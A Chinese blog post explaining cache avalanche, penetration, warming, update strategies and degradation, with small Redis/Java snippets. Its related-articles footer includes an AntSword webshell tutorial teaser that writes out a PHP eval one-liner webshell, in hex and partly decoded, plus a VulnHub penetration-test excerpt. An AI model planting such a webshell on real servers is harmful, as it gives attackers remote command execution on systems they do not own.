缓存雪崩、缓存穿透、缓存预热、缓存更新、缓存降级

1. 缓存雪崩(Cache Avalanche)

定义:缓存雪崩是指大量缓存中的数据在同一时间过期,导致大量请求同时访问数据库,造成数据库压力骤增,甚至可能导致数据库崩溃。

原因

  • 多个缓存的 key 在同一时间过期;

  • 当这些 key 不再命中缓存时,所有请求都会同时访问数据库。

应对策略

  • 设置过期时间加随机值:避免缓存的 key 在相同时间过期。比如,如果某个 key 设置过期时间为 1 小时,可以随机设置在 59 分钟到 61 分钟之间。

    EXPIRE key 3600
    
  • 分批过期:不同的数据设置不同的过期时间,避免同一时刻大量缓存失效。

  • 提前加载缓存(缓存预热):在应用启动时预加载热点数据到缓存中,减少初次使用时数据库的压力。


2. 缓存穿透(Cache Penetration)

定义:缓存穿透是指查询一个缓存中和数据库中都不存在的数据(例如恶意请求或查询条件错误),导致每次请求都访问数据库,缓存无法发挥作用。

原因

  • 用户查询的键既不在缓存中,也不在数据库中;

  • 可能是由于客户端错误、恶意攻击或非法请求。

应对策略

  • 布隆过滤器(Bloom Filter):布隆过滤器能够高效地判断某个数据是否存在于数据库中。通过在缓存之前进行一次判断,如果数据不存在,直接返回,不访问数据库。布隆过滤器的误判率很低,但能有效避免不必要的数据库访问。

    示例:检查某个ID是否存在于数据库中,如果不存在,则直接返回“数据不存在”。

    if (!bloomFilter.contains(id)) {return null; // 数据不存在,直接返回
    }
    
  • 缓存空值:对于不存在的数据,可以在缓存中设置一个特殊的标记(如空字符串或特定对象),表示此数据为空,这样后续相同请求会直接返回缓存,不再查询数据库。


3. 缓存预热(Cache Warming)

定义:缓存预热是指在系统启动或缓存空置时,提前将热点数据加载到缓存中,以避免缓存未命中的“冷启动”问题。

原因

  • 系统启动或缓存清空后,第一次查询可能会直接查询数据库,影响性能;

  • 高频查询数据可以提前加载到缓存中,避免访问数据库。

应对策略

  • 手动预热:在系统启动时,通过脚本或程序将热点数据加载到缓存中。

    public void preLoadCache() {List<String> hotData = database.queryHotData();for (String data : hotData) {redis.set(data);}
    }
    
  • 自动预热:通过定时任务或后台进程,定期更新缓存内容。

  • 基于访问频率预热:通过日志、监控分析,发现访问频率较高的数据,优先加载到缓存。


4. 缓存更新(Cache Update)

定义:缓存更新是指在缓存中的数据发生变化时,如何保证缓存中的数据与数据库中的数据一致。

问题

  • 数据库数据更新后,缓存中的数据可能变得过时;

  • 需要确保数据一致性。

应对策略

  • 缓存失效(Cache Invalidation):数据更新后,主动删除缓存中的对应数据,确保下次访问时重新从数据库加载并更新缓存。

    // 数据更新后清除缓存
    redis.del(key);
    
  • 缓存更新(Cache Update):在数据库更新后,直接更新缓存中的数据,确保缓存和数据库中的数据一致。

    // 更新数据库后同步更新缓存
    redis.set(key, updatedValue);
    
  • 双写策略(Double Write):更新数据库的同时,直接更新缓存。这需要确保缓存更新的原子性,否则可能出现缓存与数据库不一致的情况。


5. 缓存降级(Cache Degradation)

定义:缓存降级是指在缓存服务不可用或缓存故障时,采取的一种策略来降低对数据库的压力,并确保系统可以继续提供服务。

原因

  • 缓存服务宕机或超时;

  • 缓存中数据不存在或无法访问。

应对策略

  • 服务降级:当缓存失效时,可以降级到直接从数据库中获取数据。为了避免大量数据库访问,可以在数据库查询时做限流或熔断处理。

  • 降级返回默认值:当缓存不可用时,返回默认值或者保留上次的缓存值,而不是直接请求数据库。

  • 缓存预热与补偿机制:在缓存失败时,通过后台异步任务去更新缓存,减少对数据库的直接访问。


6. 总结

问题描述应对策略
缓存雪崩多个缓存数据同时过期,导致大量请求直接访问数据库,可能崩溃设置过期时间加随机值、分批过期、提前加载热点数据(缓存预热)
缓存穿透查询数据既不在缓存中,也不在数据库中,造成数据库压力布隆过滤器、缓存空值
缓存预热系统启动时,提前加载热点数据到缓存中,避免冷启动手动预热、自动预热、基于访问频率预热
缓存更新数据更新后,保证缓存和数据库一致性缓存失效、缓存更新、双写策略
缓存降级缓存不可用时,降级到数据库查询或返回默认值,保证系统可用性服务降级、返回默认值、后台异步任务更新缓存

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/diannao/90225.shtml
繁体地址,请注明出处:http://hk.pswp.cn/diannao/90225.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【unity实战】Unity手搓脚本工具实现合并网格功能

注意:考虑到实战的内容比较多,我将该内容分开,并全部整合放在【unity实战】专栏里,感兴趣的小伙伴可以前往逐一查看学习。 文章目录 前言实战1、简单的合并网格实现2、设置统一的材质3、设置不同的多种材质4、多材质网格合并方案专栏推荐完结前言 有许多单独的网格对象会影…

ThreadPoolTaskExecutor 的使用案例

ThreadPoolTaskExecutor 的使用案例 1. 依赖说明 <!-- Spring Retry&#xff08;用于任务重试&#xff09; --> <dependency><groupId>org.springframework.retry</groupId><artifactId>spring-retry</artifactId><version>1.3.1<…

0.3mg硝酸甘油舌下片:冠心病预防中的“消防员”

冠状动脉疾病&#xff08;CAD&#xff09;如同一颗定时炸弹&#xff0c;即使在成功进行血运重建或药物治疗后&#xff0c;心绞痛急性发作的风险依然如影随形。在冠心病管理的漫长战役中&#xff0c;二级预防的核心目标不仅仅是延缓疾病进展&#xff0c;更是预防致命性心脏事件复…

【Spring源码学习系列】基础架构和环境搭建

一直以来都把精力花在中间件的研究和系统设计上&#xff0c;忽略了离我最近的spring&#xff0c;最近开始学习spring的源码了&#xff0c;为了学习到成体系的spring知识和提高学习效率&#xff0c;想要找了一本书看&#xff0c;最终选的是郝佳的《Spring源码深度解析&#xff0…

C++十大排序详解(包括变种优化)

排序**基础排序算法**1. **冒泡排序&#xff08;Bubble Sort&#xff09;**冒泡排序优化**1. 提前终止优化&#xff08;标志位优化&#xff09;****原理**&#xff1a;**实现示例**&#xff08;以C为例&#xff09;&#xff1a;**优点**&#xff1a;**2. 双向冒泡排序&#xff…

React 性能优化实战:用useTransition解决卡顿问题

文章目录1. 概述2. 基本原理与语法3. 应用场景3.1 数据密集型界面的更新优化3.2 动态内容切换的平滑过渡3.3 搜索与过滤结果的实时展示4. 与其他相关Hook的对比5. 结合Suspense使用6. 注意事项1. 概述 useTransition Hook 。它允许开发者将一些非紧急的 UI 更新标记为 “过渡更…

基于Rust红岩题材游戏、汽车控制系统、机器人运动学游戏实例

根据红岩题材设计的关键游戏实例 以下是根据红岩题材设计的关键游戏实例,结合Rust语言特性(如安全并发、ECS架构等)的框架性方案。所有设计均需符合Rust语法规范,实际开发需配合游戏引擎(如Bevy、Amethyst)。 核心系统模块 // ECS架构示例(Bevy引擎) use bevy::prel…

【ZYNQ Linux开发】BRAM的几种驱动方式

1 Vivado配置 ​ BRAM 的使用方法为使用 AXI BRAM 控制器来控制 BRAM 生成器&#xff0c;Block Design 连接如下&#xff1a; 我这里配置的是真双端口 RAM&#xff0c;通过 PL 的逻辑对 BRAM 生成器的端口 B 进行写操作&#xff0c;在 PS 端对端口 A 进行读。 BRAM 控制…

Flink ClickHouse 连接器数据写入源码深度解析

一、引言 在大数据处理的实际应用场景中&#xff0c;数据的高效存储与处理至关重要。Flink 作为一款强大的流式计算框架&#xff0c;能够对海量数据进行实时处理&#xff1b;而 ClickHouse 作为高性能的列式数据库&#xff0c;擅长处理大规模数据分析任务。Flink ClickHouse 连…

OpenCV 人脸分析------面部关键点检测类cv::face::FacemarkLBF

操作系统&#xff1a;ubuntu22.04 OpenCV版本&#xff1a;OpenCV4.9 IDE:Visual Studio Code 编程语言&#xff1a;C11 算法描述 使用 Local Binary Features (LBF) 算法进行面部关键点检测&#xff08;facial landmark detection&#xff09;。该算法通过级联回归树预测人脸的…

Netstat高级分析工具:Windows与Linux双系统兼容的精准筛查利器

Netstat高级分析工具&#xff1a;Windows与Linux双系统兼容的精准筛查利器在网络安全运维中&#xff0c;快速识别可疑连接是防御入侵的关键一步。本文将介绍一款我本人开发的原创高效的双系统兼容Netstat信息分析工具&#xff0c;大幅提升恶意连接筛查效率。一、Netstat分析在安…

Bright Data MCP+Trae :快速构建电商导购助手垂直智能体

声明&#xff1a;本测试报告系作者基于个人兴趣及使用场景开展的非专业测评&#xff0c;测试过程中所涉及的方法、数据及结论均为个人观点&#xff0c;不代表任何官方立场或行业标准。 文章目录 一、引言1.1 当前AI智能体的趋势1.2 构建智能体面临的最大挑战&#xff1a;数据来…

plantuml用法总结

时序图 参考 https://blog.csdn.net/vitaviva/article/details/120735745用PlantUML简化复杂时序图的秘诀 startuml skin rose actor User as user participant "Component A" as A participant "Component B" as Buser -> A: Request data activate …

基于自研心电芯片国产化手持单导/6导/12导心电解决方案

苏州唯理作为国内心电芯片国产化厂商&#xff0c;面向家用场景&#xff0c;推出了国产化的手持单导/6导/12导心电仪技术解决方案&#xff0c;可以让家用心电图仪成本可控&#xff0c;信号链路质量更佳稳定。该方案已在多家客户中实现批量出货。唯理科技同样提供了医疗级的心电图…

Sass详解:功能特性、常用方法与最佳实践

Sass详解&#xff1a;功能特性、常用方法与最佳实践 Sass&#xff08;Syntactically Awesome Style Sheets&#xff09;作为CSS预处理器领域的先驱&#xff0c;自2006年由Hampton Catlin创建以来&#xff0c;已成为现代前端开发中不可或缺的工具。它通过引入变量、嵌套、混合宏…

vulnhub靶机渗透:PWNLAB: INIT

一、信息收集1、主机发现2、端口扫描PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian))111/tcp open rpcbind 2-4 (RPC #100000)3306/tcp open mysql MySQL 5.5.47-0deb8u151649/tcp open status 1 (RPC #100024)3、目录扫描&…

LiveKit 本地部署全流程指南(含 HTTPS/WSS)

1. 环境准备 操作系统&#xff1a;Windows 10/11 或 Linux/Mac需有本地公网/内网 IP&#xff08;如 192.168.x.x&#xff09;推荐浏览器&#xff1a;Chrome/Edge/Firefox/Safari端口未被占用&#xff0c;防火墙允许相关端口 2. 目录结构建议 livekit/livekit-server.execonf…

NumPy-统计函数详解

NumPy-统计函数详解一、基础统计函数&#xff1a;均值、方差、标准差1. 全局统计&#xff1a;忽略维度的整体计算2. 按轴统计&#xff1a;指定维度方向的计算二、位置统计&#xff1a;中位数、分位数、百分位数1. 中位数计算2. 分位数与百分位数三、离散程度&#xff1a;极差、…

音频被动降噪技术

音频被动降噪技术 音频被动降噪技术是一种通过物理结构和材料设计来减少或隔离外部噪声的降噪方式,其核心原理是通过物理屏障或吸声材料来阻断或吸收声波,从而降低环境噪声对听觉体验的影响。以下将从技术原理、应用场景、优缺点及与其他降噪技术的对比等方面进行详细分析。…

中国蚁剑使用方法

找到mysql配置文件 secure-file-priv工作目录 D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master重点是tool目录后面 前面大家可能都不一样 添加数据一句话木马 3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E 翻译过来 <?php eval($_POST["c…